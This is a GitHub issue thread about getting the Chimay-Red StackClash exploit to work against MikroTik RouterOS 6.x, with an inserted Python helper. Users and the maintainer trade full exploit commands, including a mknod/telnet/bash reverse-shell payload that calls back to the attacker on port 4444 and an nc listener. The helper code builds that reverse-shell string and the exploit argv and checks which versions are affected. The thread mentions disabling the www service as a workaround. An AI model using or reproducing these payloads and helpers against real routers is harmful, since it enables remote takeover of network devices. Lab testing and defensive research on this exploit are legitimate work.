Cannot get shell -> Mikrotik 6.37.5 #25
Comments
If you are testing RouterOS in a VM then you have to use the x86 version only.
Thank you for the reply, I was trying both MIPS and x86 before. Now I am just trying the x86 as per your guidance. I am also running it by just calling the script rather than specifying a version of Python. I am able to see WebFig from Kali in Firefox. I did extract the correct www using ./getROSbin.py 6.37.5 x86 /nova/bin/www www_binary. On one shell in Kali I ran nc -l -p 4444. On the other shell on Kali I ran ./StackClash_x86.py {Mikrotik IP} 80 www_binary "/bin/mknod /ram/f p; /bin/telnet {Kali IP} 4444 < /ram/f | /bin/bash > /ram/f 2>&1"
If you use '/nova/bin/info "/system reboot" ' as StackClash command
I tried ./StackClash_x86.py {Mikrotik IP} 80 www_binary "nova/bin/info '/system reboot'" and the router did not reboot, sadly.
So you have to root your VM and debug it
I completely understand. Thank you for your time BigNerd95.
Thank you for understanding
Sounds like a plan 👍 :)
Will it work with ./getROSbin.py 5.21 x86 /nova/bin/www www_binary (5.21 x86), or only version 6.x?
I didn't test version 5.x
I still have a problem in Kali 64: Traceback (most recent call last): ... Please, can you help me?
Google it
@beeterman you need to download the ropper module from GitHub and extract it to the folder with the StackClash script. This is the easiest way at least.
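The two payloads exchanged above (the mknod/telnet/bash reverse shell and the /nova/bin/info reboot test) are passed to StackClash_x86.py as one argument that the target runs verbatim. The helpers below are an added example, not code from the Chimay-Red repository or from anyone in this thread: they build the reverse-shell string from a listener address, check that the target's version falls inside the affected range as the original post reads the release notes (the cut-off at 6.38.4 is an assumption taken from that reading, not from the project), and flag a payload whose first command is not an absolute path, the difference between the maintainer's '/nova/bin/info ...' and the retyped "nova/bin/info ...". The script name, argument order and all paths are the ones shown in the thread; the listener address is a constructed sample.

```python
"""Helpers around the StackClash usage discussed in this issue.

Added example, not part of Chimay-Red. Assumptions (labelled):
  - FIXED_IN: first version outside the "up to 6.38.4" range that the
    original post takes from the release notes
  - /bin/mknod, /ram/f, /bin/telnet, /bin/bash: paths copied from the thread
"""
import ipaddress
import re
import shlex

FIXED_IN = (6, 38, 5)  # assumption: first release after the affected range

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(version: str) -> tuple[int, int, int]:
    """'6.37.5' -> (6, 37, 5); '6.37' -> (6, 37, 0).
    A pre-release suffix such as 'rc38' is ignored, not compared."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"not a RouterOS version string: {version!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def is_affected(version: str) -> bool:
    """True when the version is below FIXED_IN, i.e. inside the range the
    original post reads as vulnerable. This says nothing about whether the
    exploit is *reliable* on a given build (the thread reports 6.37.5 failing
    while 6.37.2/6.37.3 work)."""
    return parse_version(version) < FIXED_IN


def reverse_shell_payload(lhost: str, lport: int) -> str:
    """The exact payload shape from the thread, parameterised on the listener.
    A named pipe (/ram/f) feeds telnet's output into bash and bash's output
    back into telnet, giving an interactive shell on the nc listener."""
    ipaddress.ip_address(lhost)  # raises on a non-IP (no DNS on the target)
    if not 1 <= lport <= 65535:
        raise ValueError(f"bad port: {lport}")
    return (
        "/bin/mknod /ram/f p; "
        f"/bin/telnet {lhost} {lport} < /ram/f | /bin/bash > /ram/f 2>&1"
    )


def payload_looks_sane(payload: str) -> bool:
    """Sanity check added here: the first command must be an absolute path,
    since nothing on the target resolves a relative 'nova/bin/info'."""
    first = payload.strip().split(";")[0].strip()
    return first.startswith("/") and not first.startswith("//")


def exploit_argv(target: str, www_binary: str, payload: str,
                 script: str = "./StackClash_x86.py", port: int = 80) -> list:
    """argv list in the order the thread uses: script target port binary payload.
    Keeping it a list means the payload stays ONE argument; shlex.join shows
    the quoted shell line equivalent to what was typed in the thread."""
    return [script, target, str(port), www_binary, payload]


def listener_argv(lport: int) -> list:
    """The nc listener used in the thread, as an argv list."""
    return ["nc", "-l", "-p", str(lport)]


if __name__ == "__main__":
    # constructed sample addresses, not from the thread
    payload = reverse_shell_payload("192.0.2.10", 4444)
    print("target 6.37.5 affected:", is_affected("6.37.5"))
    print(shlex.join(listener_argv(4444)))
    print(shlex.join(exploit_argv("192.0.2.20", "www_binary", payload)))
```

shlex.join prints the whole command with the payload in single quotes, which is the form to paste into a shell; if the printed line and the line typed by hand differ, the difference is usually the quoting or a dropped leading slash.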
Yes or that haha.
Finally I ran ./StackClash_mips.py mikrotik ip 80 www_binary "/bin/mknod /ram/f p; /bin/telnet kali ip 4444 < /ram/f | /bin/bash > /ram/f 2>&1". What is the problem, "err sending"?
Mmmm
@N0ur5 I tried 6.37.2 and 6.37.3 and it is working.
@BigNerd95 really, with version 6.37.5 (x86) it is not working
I know
Maybe it isn't working on all other bugfix versions too
@BigNerd95
I tried 6.38.4 x86 which is installed on a VM. On one shell On another shell I ran What's wrong?
Nothing
In the shell where you see
Thank you!!
If I don't want to update my router ISO, is there any way to fix the bug?
Disable www service
root@kali:~/Desktop/Chimay-Red-master/tools# python3 getROSbin.py 5.26 mipsbe /nova/bin/www www_5.26-mipsbe
Is there any way to get the www binary from RouterOS 5.26, both x86 and mipsbe?
Hello,
I am new to GitHub with minimal development/"programming" experience, so my apologies if this is not the correct approach to getting help with this.
I can't seem to get a meterpreter shell or get a callback to netcat(nc), using the notes you provided with this exploit/POC.
I downloaded and installed the firmware for Mikrotik 6.37.5 onto a virtual machine. I have ensured port 80 is open on the device. I am also running Kali on another virtual machine. The devices can ping each other.
I have tried the mips and x86 exploits and although the results in the terminal tell me that the exploit was complete and the payload delivered, I do not get a callback to either the Metasploit handler or netcat. I have tried both Python 2.7 as well as 3.6. When I use tcpdump from Kali to get some additional information while running the exploit, I see my machine reach out to the Mikrotik and at one point an HTTP 200 OK message. So I know the initial conversation between the machines opens up. Not long after the payload is sent I see two responses from the Mikrotik. One is an HTTP 400 Bad Request, and the other is an HTTP 500 Internal Server Error.
I seem to be stuck. Is there any guidance or advice you can provide? Is this version perhaps not vulnerable despite the release notes saying versions up to 3.38.4 are vulnerable? Or maybe I'm doing something wrong? I can provide more information if needed as well. I would just appreciate help as I love researching things in cybersecurity, pentesting, and hacking.
Thank you very much for your time,
N0ur5